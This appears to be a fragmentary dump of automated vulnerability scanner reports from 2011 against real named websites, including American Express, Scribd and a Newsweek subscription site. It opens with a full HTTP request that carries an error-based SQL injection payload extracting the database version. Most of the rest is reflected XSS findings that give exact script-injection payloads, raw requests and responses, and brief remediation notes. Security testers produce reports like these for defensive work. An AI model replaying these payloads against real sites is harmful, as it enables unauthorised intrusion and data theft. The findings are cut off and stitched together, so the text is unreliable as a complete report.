GET /FTcontrol/index.php?orderid=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select+%40%40version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))b1c99'%3balert(1)//c14d17d233c436490&studentplace=3&studentcourse=3&studentyear=3&title=3&name=Smith&fname=Smith&lname=Smith&initials=3&company=3&city=3&address=3&address2=3&address3=3&state=3&zipcode=3&email=netsparker%40example.com&telephone=3&gender=3&debug=3&count=3&cc_type=3&cc_number=3&cc_holder=3&cc_month=3&cc_year=3&cc_scode=3&country=3&newstatus=3&interextra=3&extra_info=3&extra_info2=3&sub_type=3&isgift=3&SourceCode=3&KeyCode=3&Code=3&reference_url=3&semail=netsparker%40example.com&campaign_type=3&tagsrc=3&rnd=3&absplitsrc=3&abrnd=3&paym=3&offer=3&kind=lp&submitted=V HTTP/1.1 Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2= Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: www.newsweeksubscriptions.com Expect: 100-continue Accept-Encoding: gzip, deflate
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'b1c99';alert(1)//c14d17d233c436490' at line 1
The value of the cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a558'-alert(1)-'86896b00bf2 was submitted in the cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.65. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff6b"><script>alert(1)</script>ba1cf7adb44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.66. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 410e5'-alert(1)-'714c9e3ae1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.67. http://www.scribd.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scribd.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bbd6"><script>alert(1)</script>7515f478d03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.68. http://www.scribd.com/about [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scribd.com
Path:
/about
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1922"><script>alert(1)</script>9a830630727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the start_page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c182c</script><script>alert(1)</script>f9494dd5f8b was submitted in the start_page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0e7c"><script>alert(1)</script>599f285be8c was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /destinations?issuerName=us_amexnetworkdefaulta0e7c"><script>alert(1)</script>599f285be8c HTTP/1.1 Host: www1.amexnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www1.amexnetwork.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Content-Length: 37098 Cache-Control: no-cache Expires: Thu, 06 Oct 2011 21:12:48 GMT Date: Thu, 06 Oct 2011 21:12:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cc6a"%3balert(1)//900ad427800 was submitted in the inav parameter. This input was echoed as 7cc6a";alert(1)//900ad427800 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 21:06:37 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b; Expires=Thu, 13 Oct 2011 21:06:37 GMT Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 82950
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.72. http://www262.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www262.americanexpress.com
Path:
/business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fdf"%3balert(1)//399f8a74f40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2fdf";alert(1)//399f8a74f40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:45:33 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b; Expires=Thu, 13 Oct 2011 20:45:32 GMT Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e10"%3balert(1)//a3a2a865af9 was submitted in the view-all-business-cards&inav parameter. This input was echoed as c2e10";alert(1)//a3a2a865af9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:45:27 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b; Expires=Thu, 13 Oct 2011 20:45:26 GMT Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 82975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fabc4%3balert(1)//8e8cff1b484 was submitted in the sj_tabToOpen parameter. This input was echoed as fabc4;alert(1)//8e8cff1b484 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 21:11:19 GMT Server: IBM_HTTP_Server Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 53984
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- conditional comments add classes to html tag for bulletproof version/ ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 1fabc4;alert(1)//8e8cff1b484; var sj_modalToOpen = "null"; var sj_servername = "www304.americanexpress.com"; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e040'-alert(1)-'80f1fd50ffd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
// This calls the initialization once Facebook libraries are loaded window.fbAsyncInit = Scribd.Facebook.initializeConnect.bind(Scribd.Faceboo ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dc45"-alert(1)-"51b244a5ea4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the SaneID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b02"><script>alert(1)</script>46627ffb0fe was submitted in the SaneID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload d5ce1<script>alert(1)</script>6c4c2a73044 was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.